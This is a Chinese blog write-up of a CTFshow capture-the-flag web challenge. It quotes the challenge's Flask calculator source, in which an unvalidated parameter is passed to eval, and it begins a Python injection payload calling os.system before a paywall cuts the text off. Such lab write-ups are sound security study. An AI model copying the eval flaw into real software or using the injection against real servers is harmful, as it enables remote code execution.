CTFshow-菜狗杯-算力超群-算力升级-无一幸免FIXED

最新推荐文章于 2024-08-21 10:30:00 发布
最新推荐文章于 2024-08-21 10:30:00 发布
阅读量1.5k 收藏 1
点赞数 2
分类专栏: CTF WEB 参数传递 文章标签: web安全 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31415417/article/details/129248647
版权

算力超群

题目来源

CTFshow-菜狗杯-WEB

题目考点

简单沙箱逃逸

题目源码

题目源码来自writeup

# -*- coding: utf-8 -*-
# @Time    : 2022/11/2
# @Author  : 探姬
# @Forkfrom:https://github.com/helloflask/calculator

import re
from flask import Flask, jsonify, render_template, request

app = Flask(__name__)

@app.route('/_calculate')
def calculate():
    a = request.args.get('number1', '0')
    operator = request.args.get('operator', '+')
    b = request.args.get('number2', '0')

    m = re.match(r'^\-?\d*[.]?\d*$', a)
    n = re.match(r'^\-?\d*[.]?\d*$', a)

    if m is None or n is None or operator not in '+-*/':
        return jsonify(result='Error!')

    if operator == '/':
        result = eval(a + operator + str(float(b)))
    else:
        result = eval(a + operator + b)
    return jsonify(result=result)

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/hint')
def hint():
    return render_template('hint.html')

if __name__ == '__main__':
    app.run()

解题过程

执行请求 http://1ed5282a-5e0e-42a0-b8a0-460fe11c6202.challenge.ctf.show/_calculate?number1=7&operator=*&number2=XXXX 报错如下:

在这里插入图片描述


审阅源码得到

m = re.match(r'^\-?\d*[.]?\d*$', a)
n = re.match(r'^\-?\d*[.]?\d*$', a)

粗心的复制粘贴导致最后一个变量没有任何校验,所以直接使用b进行执行。
先拿报错骗出路径,因为没有回显,所以我们将结果写入可见的路由部分就好了。
#g4的payload

payload:?number2=1,__import__('os').syst
最低0.47元/天 解锁文章
白泽安全
关注
专栏目录
WEB-化整为零-无一幸免
qq_31415417的博客
01-21 322
WEB-化整为零-无一幸免
ctfshow-菜狗杯-WEB-wp
F1rstb100d
11-14 1429
ctfshow-菜狗杯-WEB-wp
ctfshow菜狗杯wp
m0_62274649的博客
11-17 2598
菜狗杯wp
CTFshow菜狗杯-misc-wp(详解 脚本 过程 全)
最新发布
wangluoanquan111的博客
08-21 975
废话不多话开启你们的旅程吧 这个也是我这几天才看 一些见解和思路分享给你们希望你们在旅途中玩的开心,学的开心✌( •̀ ω •́ )y。
CFTSHOW_菜狗杯_无一幸免
weixin_58052886的博客
06-13 282
点击进入靶场,分析代码可以得到以下结论:首先构建url语句并测试,发现直接获得flag的值:
ctfshow 菜狗杯wp
m0_64815693的博客
11-14 5279
ctfshow 菜狗杯 wp
CTFshow-菜狗杯-茶歇区-小舔田
qq_31415417的博客
02-16 1111
CTFshow-菜狗杯-茶歇区-小舔田
ctfshow【菜狗杯】wp
leekos的博客,分享web安全相关知识~
03-07 2114
ctfshow【菜狗杯】wp
偏序LA-半超群及其性质的研究
Þ◦¼ ð◦ Þ◦22ð◦ Þ◦¼ð◦ Þ◦ð◦ÞJournalof the Egyptian Mathematical Society(2015)23,231埃及数学学会埃及数学学会www.etms-eg.orgwww.elsevier.com/locate/joems原创文章偏序左几乎半超群Naveed...
2H3A-16型步进电机驱动器说明书
03-20
2H3A-16型步进电机驱动器是一款由北京时代超群电器科技有限公司自主研发并设计的高性能多细分驱动器,主要用于驱动双极性步进电机。它采用先进的电流控制技术,能精确控制电机电流,有效降低输出力矩脉动,并提高...
精品资料(2021-2022年收藏)浅谈项羽失败的原因.docx
10-10
#### (一)、个人能力超群,对部下缺少锻炼 项羽个人的军事才能非常突出,这让他在战场上获得了巨大的成功。然而,他对部下的过分依赖和个人英雄主义的态度,导致他很少给手下将领独立行动的机会。这种做法使得他...
CTFShow Web12
qq_62566956的博客
03-30 325
因为使用dirsearch的时候比较慢,可以将CTF中常用的路径放到字典的前面,如本题中的robots.txt。输入即可得到flag。
ctfshow-web12
m0_73303597的博客
11-24 744
自用
ctfshow 愚人杯&菜狗杯部分题目(flasksession伪造&ssti)
weixin_63231007的博客
04-11 1850
flask-session伪造 + 无过滤ssti命令执行 + php整数溢出
CTFshow 菜狗杯 web方向 全
Jay17的博客
09-01 3553
CTFshow 菜狗杯 web方向 全
NSSCTF靶场题解(8)
5fn
08-11 2306
这次写题的感悟是,其实写过的题再写一遍未必能写出来,适时反过去去写旧题,也许有新的感悟?细节解释的多,重要理解部分拆分为细节阐述,payload细节理解方面参考过很多篇wp。尽我所能把细节阐释到位。
ctfshow【菜狗杯】misc
leekos的博客,分享web安全相关知识~
03-13 2720
ctfshow【菜狗杯】misc
i春秋试验场 CTF夺旗赛(第二季)WEB calculate、calculate2
A_dmin的博客
10-27 1348
i春秋试验场 CTF夺旗赛(第二季)WEB calculate、calculate2 emmmm,这个比赛是10月26结束的,刚刚好那一天去i春秋逛了一下 恰好看见有这个比赛,就做了几道题目,这两个题是跑脚本的,计算网页类算式的那种 觉得有点意思就记录一下 两道题目其实差不多,写的这个脚本两道题都可以跑,,, 直接能出答案,失败了就多运行几次就行 其实这两道题是有区别的: 第二题每个数字都...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值